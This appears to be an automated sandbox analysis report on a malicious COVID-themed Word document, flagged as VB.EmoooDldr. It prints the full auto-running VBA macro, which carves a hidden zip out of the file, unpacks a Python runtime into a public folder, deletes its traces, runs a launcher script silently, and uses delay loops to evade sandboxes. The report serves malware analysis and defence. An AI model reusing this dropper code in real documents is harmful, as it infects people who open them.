VTI SCORE: 100/100
Dynamic Analysis Report
Classification: -
Threat Names:
VB.EmoooDldr.2.Gen
Filename Category Type Severity
C:\Users\FD1HVy\Desktop\VPIyNbbmtoYiYfrB.doc Sample File Word Document Malicious
Also Known As C:\Users\Public\docer.doc (Dropped File)
Mime Type application/msword
File Size 7.88 MB
MD5 ba1618a981f755eb752aa5dc90bd70a4
SHA1 a3b6e33901ffc15d15e2f3abae98c6da48727454
SHA256 a703dc8819dca1bc5774de3b6151c355606e7fe93c760b56bc09bcb6f928ba2d
SSDeep 196608:WEHZYtulHyQiaalIFVAa8oPe5Nxhq1gMqnDORSGa:vmtulHF7b4a8GeFhYqnea
ImpHash -
Parser Error Remark Static engine was unable to completely parse the analyzed file
Office Information
Creator Jeremy
Last Modified By Jeremy
Revision 251
Create Time 2019-11-11 06:20:00+00:00
Modify Time 2020-04-13 19:26:00+00:00
Document Information
Codepage ANSI_Cyrillic
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Company SPecialiST RePack
Document Security SECURITY_LOCKED
Editing Time 264540.0
Page Count 3
Line Count 39
Paragraph Count 11
Word Count 839
Character Count 4787
Chars With Spaces 5615
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (1)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
    ActiveDocument.ActiveWindow.View.ReadingLayout = False
    ActiveDocument.Unprotect "securePass"
    show
    ActiveDocument.Protect wdAllowOnlyReading, True, "securePass", False, False
    
    Dim data As String
    Dim User As String
    Dim bla As String
    Dim Coper As Object
    User = "C:\Users\Public"

    Docer = ActiveDocument.FullName
    
    'Copy
    Call Shell("cmd /c copy " + Docer + " " + User + "\docer.doc", vbHide)
    deay (4)
    data = bin2var(User + "\docer.doc")
    data = Right(data, 7074638)
    var2bin User + "\smile.zip", data
    
    bla = VBA.FileSystem.Dir(User + "\Python37", vbDirectory)
    If bla <> VBA.Constants.vbNullString Then
        Call Shell("cmd /c rmdir /s /q " + User + "\Python37", vbHide)
        deay (2)
    End If
    'Unzip
    Unzip User + "\smile.zip", User, "Python37"
    'Clean
    Kill User + "\smile.zip"
    Kill User + "\docer.doc"
    'Run
    Call Shell("""" & User & "\Python37\python.exe" & """ """ & User & "\Python37\launcher.py" & """", vbHide)
End Sub

Function bin2var(filename As String) As String

'Which alters when it alteration finds,
'Or bends with the remover to remove.
    Dim f As Integer
    f = FreeFile()
    Open filename For Binary Access Read Lock Write As #f
        bin2var = Space(FileLen(filename))
        Get #f, , bin2var
    Close #f
'O no! it is an ever-fixed mark
'That looks on tempests and is never shaken;

End Function
'It is the star to every wand'ring bark,
'Whose worth 's unknown, although his height be taken.
'Love 's not Time's fool, though rosy lips and cheeks
'Within his bending sickle's compass come;

Sub var2bin(filename As String, data As String)

'If this be error and upon me prov'd,
'I never writ, nor no man ever lov'd.
    Dim f As Integer
    f = FreeFile()
    Open filename For Output Access Write Lock Write As #f
        Print #f, data;
    Close #f
End Sub
'Love alters not with his brief hours and weeks,
'But bears it out even to the edge of doom.

Sub Unzip(Fname As Variant, DefPath As String, TarFold As String)
    Dim oApp As Object
    Dim FileNameFolder As Variant

    'Root folder for the new folder.
    If Right(DefPath, 1) <> "\" Then
        DefPath = DefPath & "\"
    End If

    'Create the folder name
    strDate = Format(Now, " dd-mm-yy h-mm-ss")
    FileNameFolder = DefPath & TarFold & "\"

    'Make the normal folder in DefPath
    MkDir FileNameFolder

    'Extract the files into the newly created folder
    Set oApp = CreateObject("Shell.Application")
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, 4
End Sub


Sub hide()
    ActiveDocument.Sections(1).Range.Font.Hidden = False
    For Each Section In ActiveDocument.Sections
        If Section.Index > 1 Then Section.Range.Font.Hidden = True
    Next
End Sub

Sub show()
    ActiveDocument.Sections(1).Range.Font.Hidden = True
    For Each Section In ActiveDocument.Sections
        If Section.Index > 1 Then Section.Range.Font.Hidden = False
    Next
End Sub

Function deay(min)

  Dim ptr
  ptr = DateAdd("s", min, Time())
  If ptr > Time() Then
    Do Until (Time() > ptr)
    Loop
  End If

End Function
Document Content Snippet
W l "] ) ) ) ) ) ) ) ) g g ) ) ) ) ~g ) ) ) ) l ) ) ) ) ) ) ) ) ) \ m : C O V I D - 1 9 s Yb Yb i n d Yn a ...
Local AV Matches (1)
Threat Name Severity
VB.EmoooDldr.2.Gen Malicious
YARA Matches (2)
Rule Name Rule Description Classification Score
VBA_Execution_Commands VBA macro may execute files or system commands - 3/5
VBA_Time_Delay_Loops VBA macro utilizes time delay loops; possible impact upon dynamic analysis - 1/5
C:\Users\Public\smile.zip Dropped File Unknown Not Queried
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -